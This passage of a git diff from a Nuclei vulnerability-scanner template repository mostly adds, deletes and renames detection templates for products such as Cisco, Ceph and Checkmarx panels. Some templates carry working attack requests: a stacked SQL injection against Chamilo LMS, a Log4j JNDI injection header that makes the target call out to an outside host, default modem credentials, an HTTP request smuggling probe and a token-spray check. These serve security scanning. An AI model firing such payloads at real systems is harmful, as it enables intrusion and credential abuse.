'
- - '404 Not Found
'
- condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/ceph.yaml b/nuclei-templates/Other/ceph.yaml
deleted file mode 100644
index 2f6265b5a6..0000000000
--- a/nuclei-templates/Other/ceph.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: ceph
-info:
- name: Ceph distributed filesystem
- author: nmap,cn-kali-team
- tags: detect,tech,ceph,service
- severity: info
- metadata:
- info: ipv4
- rarity: 0
- version: protocol $1
-tcp:
-- name: 'null'
- inputs:
- - data: ''
- host:
- - '{{Hostname}}'
- extractors:
- - name: ceph
- type: regex
- regex:
- - (?i)^ceph (v[\w._-]+)\0\0\0\0....\0\x02......\0{120}\0\0\0\0....\0\x02......\0{120}
diff --git a/nuclei-templates/Other/cerebro-panel-878.yaml b/nuclei-templates/Other/cerebro-panel-878.yaml
index f6d03517ac..88c17dfd12 100644
--- a/nuclei-templates/Other/cerebro-panel-878.yaml
+++ b/nuclei-templates/Other/cerebro-panel-878.yaml
@@ -4,8 +4,7 @@ info:
name: Cerebro Panel
author: huowuzhao,elder tao
severity: info
- reference:
- - https://github.com/lmenezes/cerebro
+ reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro
requests:
diff --git a/nuclei-templates/Other/certificate-validation-882.yaml b/nuclei-templates/Other/certificate-validation-882.yaml
new file mode 100644
index 0000000000..64a9fecc52
--- /dev/null
+++ b/nuclei-templates/Other/certificate-validation-882.yaml
@@ -0,0 +1,16 @@
+id: improper-certificate-validation
+
+info:
+ name: Improper Certificate Validation
+ author: gaurang
+ severity: medium
+ tags: android,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "Landroid/webkit/SslErrorHandler;->proceed()V"
\ No newline at end of file
diff --git a/nuclei-templates/Other/certificate-validation-884.yaml b/nuclei-templates/Other/certificate-validation-884.yaml
deleted file mode 100644
index e8135c2786..0000000000
--- a/nuclei-templates/Other/certificate-validation-884.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: improper-certificate-validation
-info:
- name: Improper Certificate Validation
- author: gaurang
- severity: medium
- tags: android,file
-file:
- - extensions:
- - all
- matchers:
- - type: word
- words:
- - "Landroid/webkit/SslErrorHandler;->proceed()V"
diff --git a/nuclei-templates/Other/cgi-printenv-885.yaml b/nuclei-templates/Other/cgi-printenv-886.yaml
similarity index 100%
rename from nuclei-templates/Other/cgi-printenv-885.yaml
rename to nuclei-templates/Other/cgi-printenv-886.yaml
diff --git a/nuclei-templates/Other/cgi-test-page-887.yaml b/nuclei-templates/Other/cgi-test-page-890.yaml
similarity index 100%
rename from nuclei-templates/Other/cgi-test-page-887.yaml
rename to nuclei-templates/Other/cgi-test-page-890.yaml
diff --git a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml b/nuclei-templates/Other/chamilo-lms-sqli-891.yaml
deleted file mode 100644
index bebc2183d4..0000000000
--- a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: chamilo-lms-sqli
-info:
- name: Chamilo LMS SQL Injection
- author: undefl0w
- severity: high
- description: Finds sql injection in Chamilo version 1.11.14
- tags: chamilo,sqli
-requests:
- - raw:
- - |
- POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "]
- - |
- POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "]
- req-condition: true
- matchers:
- - type: dsl
- dsl:
- - 'contains(body_2, "{{randstr}}")'
diff --git a/nuclei-templates/Other/chamilo-lms-sqli-892.yaml b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml
new file mode 100644
index 0000000000..8a3b456b4d
--- /dev/null
+++ b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml
@@ -0,0 +1,29 @@
+id: chamilo-lms-sqli
+info:
+ author: undefl0w
+ name: Chamilo LMS SQL Injection
+ severity: high
+ description: Finds sql injection in Chamilo version 1.11.14
+ tags: chamilo,sqli
+
+requests:
+ - raw:
+ - |
+ POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "]
+
+ - |
+ POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "]
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "{{randstr}}")'
\ No newline at end of file
diff --git a/nuclei-templates/Other/chanjet-crm-sqli.yaml b/nuclei-templates/Other/chanjet-CRM-sqli.yaml
similarity index 100%
rename from nuclei-templates/Other/chanjet-crm-sqli.yaml
rename to nuclei-templates/Other/chanjet-CRM-sqli.yaml
diff --git a/nuclei-templates/Other/checkmarx-panel-895.yaml b/nuclei-templates/Other/checkmarx-panel-895.yaml
deleted file mode 100644
index 70b24b66eb..0000000000
--- a/nuclei-templates/Other/checkmarx-panel-895.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: checkmarx-panel-detect
-
-info:
- name: Checkmarx WebClient detector
- author: joanbono
- severity: info
- tags: panel,checkmarx
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cxwebclient/Login.aspx"
-
- matchers:
- - type: word
- words:
- - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
- part: body
diff --git a/nuclei-templates/Other/checkmarx-panel.yaml b/nuclei-templates/Other/checkmarx-panel.yaml
new file mode 100644
index 0000000000..4aa65b0e49
--- /dev/null
+++ b/nuclei-templates/Other/checkmarx-panel.yaml
@@ -0,0 +1,19 @@
+id: checkmarx-panel-detect
+
+info:
+ name: Checkmarx WebClient detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cxwebclient/Login.aspx"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers:
+ - type: word
+ words:
+ - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
+ part: body
diff --git a/nuclei-templates/Other/checkpoint-panel-898.yaml b/nuclei-templates/Other/checkpoint-panel.yaml
similarity index 100%
rename from nuclei-templates/Other/checkpoint-panel-898.yaml
rename to nuclei-templates/Other/checkpoint-panel.yaml
diff --git a/nuclei-templates/Other/chevereto-detect.yaml b/nuclei-templates/Other/chevereto-detect-905.yaml
similarity index 100%
rename from nuclei-templates/Other/chevereto-detect.yaml
rename to nuclei-templates/Other/chevereto-detect-905.yaml
diff --git a/nuclei-templates/Other/chinaunicom-default-login-906.yaml b/nuclei-templates/Other/chinaunicom-default-login-906.yaml
deleted file mode 100644
index ad88f640d7..0000000000
--- a/nuclei-templates/Other/chinaunicom-default-login-906.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: chinaunicom-default-login
-info:
- name: China Unicom Modem Default Login
- author: princechaddha
- severity: high
- description: Default login credentials were discovered for a China Unicom modem.
- classification:
- cwe-id: CWE-798
- tags: chinaunicom,default-login
-requests:
- - raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Hostname}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
- attack: pitchfork
- payloads:
- username:
- - CUAdmin
- password:
- - CUAdmin
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
-
-# Enhanced by mp on 2022/03/03
diff --git a/nuclei-templates/Other/chinaunicom-default-login.yaml b/nuclei-templates/Other/chinaunicom-default-login.yaml
new file mode 100644
index 0000000000..0121060abf
--- /dev/null
+++ b/nuclei-templates/Other/chinaunicom-default-login.yaml
@@ -0,0 +1,28 @@
+id: chinaunicom-default-login
+info:
+ name: Chinaunicom Modem Default Login
+ author: princechaddha
+ severity: high
+ tags: chinaunicom,default-login
+requests:
+ - raw:
+ - |
+ POST /cu.html HTTP/1.1
+ Host: {{Hostname}}
+
+ frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
+ attack: pitchfork
+ payloads:
+ username:
+ - CUAdmin
+ password:
+ - CUAdmin
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ words:
+ - "/menu.gch"
+ part: header
diff --git a/nuclei-templates/Other/chinaunicom-modem-default-credentials-910.yaml b/nuclei-templates/Other/chinaunicom-modem-default-credentials-910.yaml
new file mode 100644
index 0000000000..ed58f2f847
--- /dev/null
+++ b/nuclei-templates/Other/chinaunicom-modem-default-credentials-910.yaml
@@ -0,0 +1,22 @@
+id: chinaunicom-modem-default-credentials
+
+info:
+ name: Chinaunicom Modem Default Credentials
+ author: princechaddha
+ severity: high
+ tags: chinaunicom,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/cu.html"
+ body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ words:
+ - "/menu.gch"
+ part: header
diff --git a/nuclei-templates/Other/chinaunicom-modem-default-credentials.yaml b/nuclei-templates/Other/chinaunicom-modem-default-credentials.yaml
deleted file mode 100644
index 9498a9b6f9..0000000000
--- a/nuclei-templates/Other/chinaunicom-modem-default-credentials.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: chinaunicom-modem-default-credentials
-info:
- name: Chinaunicom Modem Default Credentials
- author: princechaddha
- severity: high
- tags: chinaunicom,default-login
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/cu.html"
- body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
diff --git a/nuclei-templates/Other/circleci-config-924.yaml b/nuclei-templates/Other/circleci-config.yaml
similarity index 100%
rename from nuclei-templates/Other/circleci-config-924.yaml
rename to nuclei-templates/Other/circleci-config.yaml
diff --git a/nuclei-templates/Other/circleci-ssh-config-928.yaml b/nuclei-templates/Other/circleci-ssh-config.yaml
similarity index 100%
rename from nuclei-templates/Other/circleci-ssh-config-928.yaml
rename to nuclei-templates/Other/circleci-ssh-config.yaml
diff --git a/nuclei-templates/Other/circleci.yaml b/nuclei-templates/Other/circleci.yaml
new file mode 100644
index 0000000000..b01e427381
--- /dev/null
+++ b/nuclei-templates/Other/circleci.yaml
@@ -0,0 +1,22 @@
+id: api-circleci
+
+info:
+ name: CircleCI API Test
+ author: zzeitlin
+ reference: https://circleci.com/docs/api/v1
+ severity: info
+ tags: token-spray,circleci
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://circleci.com/api/v1.1/me?circle-token={{token}}"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"admin"'
+ - '"login"'
+ condition: and
diff --git a/nuclei-templates/Other/cisco-asa-panel-932.yaml b/nuclei-templates/Other/cisco-asa-panel-932.yaml
new file mode 100644
index 0000000000..b87b8121bf
--- /dev/null
+++ b/nuclei-templates/Other/cisco-asa-panel-932.yaml
@@ -0,0 +1,22 @@
+id: cisco-asa-panel-detect
+
+info:
+ name: Cisco ASA VPN panel detect
+ author: organiccrap
+ severity: info
+ tags: cisco,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/+CSCOE+/logon.html"
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "/+CSCOU+/portal.css"
+ - "SSL VPN Service"
+ condition: or
\ No newline at end of file
diff --git a/nuclei-templates/Other/cisco-asa-panel-935.yaml b/nuclei-templates/Other/cisco-asa-panel-935.yaml
deleted file mode 100644
index 4ecc31bf30..0000000000
--- a/nuclei-templates/Other/cisco-asa-panel-935.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: cisco-asa-panel-detect
-
-info:
- name: Cisco ASA VPN panel detect
- author: organiccrap
- severity: info
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/+CSCOE+/logon.html"
- matchers:
- - type: word
- words:
- - "
SSL VPN Service"
- part: body
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
new file mode 100644
index 0000000000..af3f889993
--- /dev/null
+++ b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
@@ -0,0 +1,63 @@
+id: cisco-cloudcenter-suite-log4j-rce
+
+info:
+ name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution
+ author: pwnhxl
+ severity: critical
+ description: |
+ Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+ reference:
+ - https://logging.apache.org/log4j/2.x/security.html
+ - http://www.openwall.com/lists/oss-security/2021/12/10/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ fofa-query: title="CloudCenter Suite"
+ shodan-query: title:"CloudCenter Suite"
+ tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /suite-auth/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+ Content-Type: application/json
+
+ {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+
+ - type: word
+ part: header
+ words:
+ - 'X-RateLimit-Limit-suite-gateway_suite-auth'
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+
+# Enhanced by md on 2023/03/22
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
deleted file mode 100644
index 37a4dabf81..0000000000
--- a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
+++ /dev/null
@@ -1,73 +0,0 @@
-id: cisco-cloudcenter-suite-log4j-rce
-
-info:
- name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution
- author: pwnhxl
- severity: critical
- description: |
- Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- reference:
- - https://logging.apache.org/log4j/2.x/security.html
- - http://www.openwall.com/lists/oss-security/2021/12/10/1
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2021-44228
- cwe-id: CWE-77
- metadata:
- max-request: 1
- shodan-query: title:"CloudCenter Suite"
- fofa-query: title="CloudCenter Suite"
- tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
-variables:
- rand1: '{{rand_int(111, 999)}}'
- rand2: '{{rand_int(111, 999)}}'
-
-http:
- - raw:
- - |
- @timeout: 10s
- POST /suite-auth/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
- Content-Type: application/json
-
- {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'X-RateLimit-Limit-suite-gateway_suite-auth'
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- extractors:
- - type: kval
- kval:
- - interactsh_ip
-
- - type: regex
- part: interactsh_request
- group: 2
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
-# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/Other/cisco-edge-340-936.yaml b/nuclei-templates/Other/cisco-edge-340.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-edge-340-936.yaml
rename to nuclei-templates/Other/cisco-edge-340.yaml
diff --git a/nuclei-templates/Other/cisco-finesse-login-938.yaml b/nuclei-templates/Other/cisco-finesse-login-938.yaml
index 0944959e91..ad8938564b 100644
--- a/nuclei-templates/Other/cisco-finesse-login-938.yaml
+++ b/nuclei-templates/Other/cisco-finesse-login-938.yaml
@@ -4,7 +4,8 @@ info:
name: Cisco Finesse Login
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/6824
+ reference:
+ - https://www.exploit-db.com/ghdb/6824
tags: panel,cisco
requests:
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
deleted file mode 100644
index 112800ebd8..0000000000
--- a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cisco-meraki-exposure
-
-info:
- name: Cisco Meraki cloud & security Appliances Information Disclosure
- author: dhiyaneshDK,r3naissance
- severity: info
- reference: https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco,meraki,disclosure
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/#connection'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - 'This security appliance is directly connected to a local network'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-meraki-exposure.yaml b/nuclei-templates/Other/cisco-meraki-exposure.yaml
new file mode 100644
index 0000000000..d14835d3a6
--- /dev/null
+++ b/nuclei-templates/Other/cisco-meraki-exposure.yaml
@@ -0,0 +1,26 @@
+id: cisco-meraki-exposure
+
+info:
+ name: Cisco Meraki cloud & security Appliances Information Disclosure
+ author: dhiyaneshDK,r3naissance
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6708
+ tags: panel,cisco,meraki,disclosure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#connection'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Your client connection'
+ - 'This security appliance is directly connected to a local network'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-network-config-949.yaml b/nuclei-templates/Other/cisco-network-config-949.yaml
index 0de9a2b420..04d2a4045e 100644
--- a/nuclei-templates/Other/cisco-network-config-949.yaml
+++ b/nuclei-templates/Other/cisco-network-config-949.yaml
@@ -4,9 +4,8 @@ info:
name: Cisco System Network Configuration Exposure
author: DhiyaneshDk
severity: low
- reference:
- - https://www.exploit-db.com/ghdb/5430
- tags: config,exposure,cisco
+ reference: https://www.exploit-db.com/ghdb/5430
+ tags: config,exposure,cisco,network
requests:
- method: GET
diff --git a/nuclei-templates/Other/cisco-prime-infrastructure-952.yaml b/nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-prime-infrastructure-952.yaml
rename to nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
diff --git a/nuclei-templates/Other/cisco-secure-cn.yaml b/nuclei-templates/Other/cisco-secure-cn-958.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-secure-cn.yaml
rename to nuclei-templates/Other/cisco-secure-cn-958.yaml
diff --git a/nuclei-templates/Other/cisco-sendgrid-968.yaml b/nuclei-templates/Other/cisco-sendgrid-968.yaml
new file mode 100644
index 0000000000..d9708bf9f3
--- /dev/null
+++ b/nuclei-templates/Other/cisco-sendgrid-968.yaml
@@ -0,0 +1,30 @@
+id: cisco-sendgrid
+
+info:
+ name: Cisco ServiceGrid
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-sendgrid-969.yaml b/nuclei-templates/Other/cisco-sendgrid-969.yaml
deleted file mode 100644
index beabbae9a8..0000000000
--- a/nuclei-templates/Other/cisco-sendgrid-969.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: cisco-sendgrid
-
-info:
- name: Cisco ServiceGrid
- author: dhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"Cisco ServiceGrid"
- tags: panel,cisco
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/pages/sdcall/Login.jsp'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-smi-exposure-972.yaml b/nuclei-templates/Other/cisco-smi-exposure-971.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-smi-exposure-972.yaml
rename to nuclei-templates/Other/cisco-smi-exposure-971.yaml
diff --git a/nuclei-templates/Other/cisco-systems-login-975.yaml b/nuclei-templates/Other/cisco-systems-login-973.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-systems-login-975.yaml
rename to nuclei-templates/Other/cisco-systems-login-973.yaml
diff --git a/nuclei-templates/Other/cisco-telepresence-976.yaml b/nuclei-templates/Other/cisco-telepresence-976.yaml
deleted file mode 100644
index 93a3d7423f..0000000000
--- a/nuclei-templates/Other/cisco-telepresence-976.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cisco-telepresence
-
-info:
- name: Cisco Telepresence
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Cisco Telepresence"
- tags: panel,cisco
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/login.html"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
Cisco TelePresence MCU - login:"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-telepresence-978.yaml b/nuclei-templates/Other/cisco-telepresence-978.yaml
new file mode 100644
index 0000000000..adc3eca85a
--- /dev/null
+++ b/nuclei-templates/Other/cisco-telepresence-978.yaml
@@ -0,0 +1,25 @@
+id: cisco-telepresence
+
+info:
+ name: Cisco Telepresence
+ author: dhiyaneshDk
+ severity: info
+ tags: panel,cisco
+ metadata:
+ shodan-query: 'http.title:"Cisco Telepresence"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
Cisco TelePresence MCU - login:"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-ucs-kvm-login-980.yaml b/nuclei-templates/Other/cisco-ucs-kvm-login-979.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-ucs-kvm-login-980.yaml
rename to nuclei-templates/Other/cisco-ucs-kvm-login-979.yaml
diff --git a/nuclei-templates/Other/citrix-vpn-detect.yaml b/nuclei-templates/Other/citrix-vpn-detect-987.yaml
similarity index 100%
rename from nuclei-templates/Other/citrix-vpn-detect.yaml
rename to nuclei-templates/Other/citrix-vpn-detect-987.yaml
diff --git a/nuclei-templates/Other/ckan-dom-based-xss-990.yaml b/nuclei-templates/Other/ckan-dom-based-xss-992.yaml
similarity index 100%
rename from nuclei-templates/Other/ckan-dom-based-xss-990.yaml
rename to nuclei-templates/Other/ckan-dom-based-xss-992.yaml
diff --git a/nuclei-templates/Other/cl-te-http-smuggling.yaml b/nuclei-templates/Other/cl-te-http-smuggling.yaml
deleted file mode 100644
index 9ec6be96b8..0000000000
--- a/nuclei-templates/Other/cl-te-http-smuggling.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: CL-TE-http-smuggling
-
-info:
- name: HTTP request smuggling, basic CL.TE vulnerability
- author: pdteam, akincibor
- severity: Low
-
-requests:
- - raw:
- - |+
- POST / HTTP/1.1
- Host: {{Hostname}}
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 6
- Transfer-Encoding: chunked
-
- 0
-
- G
- - |+
- POST / HTTP/1.1
- Host: {{Hostname}}
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 6
- Transfer-Encoding: chunked
-
- 0
-
- G
-
- unsafe: true
- matchers:
- - type: dsl
- dsl:
- - 'contains(body, "Unrecognized method GPOST")'
\ No newline at end of file
diff --git a/nuclei-templates/Other/clearpass-policy-manager-1000.yaml b/nuclei-templates/Other/clearpass-policy-manager-1000.yaml
new file mode 100644
index 0000000000..57a79fe6af
--- /dev/null
+++ b/nuclei-templates/Other/clearpass-policy-manager-1000.yaml
@@ -0,0 +1,23 @@
+id: clearpass-policy-manager
+
+info:
+ name: ClearPass Policy Manager - Aruba Networks
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+ tags: panel,aruba
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/tips/tipsLogin.action'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
ClearPass Policy Manager - Aruba Networks'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/clearpass-policy-manager-1001.yaml b/nuclei-templates/Other/clearpass-policy-manager-1001.yaml
deleted file mode 100644
index f0f26c0b46..0000000000
--- a/nuclei-templates/Other/clearpass-policy-manager-1001.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: clearpass-policy-manager
-
-info:
- name: ClearPass Policy Manager - Aruba Networks
- author: dhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"ClearPass Policy Manager"
- tags: panel,aruba
-
-requests:
- - method: GET
- path:
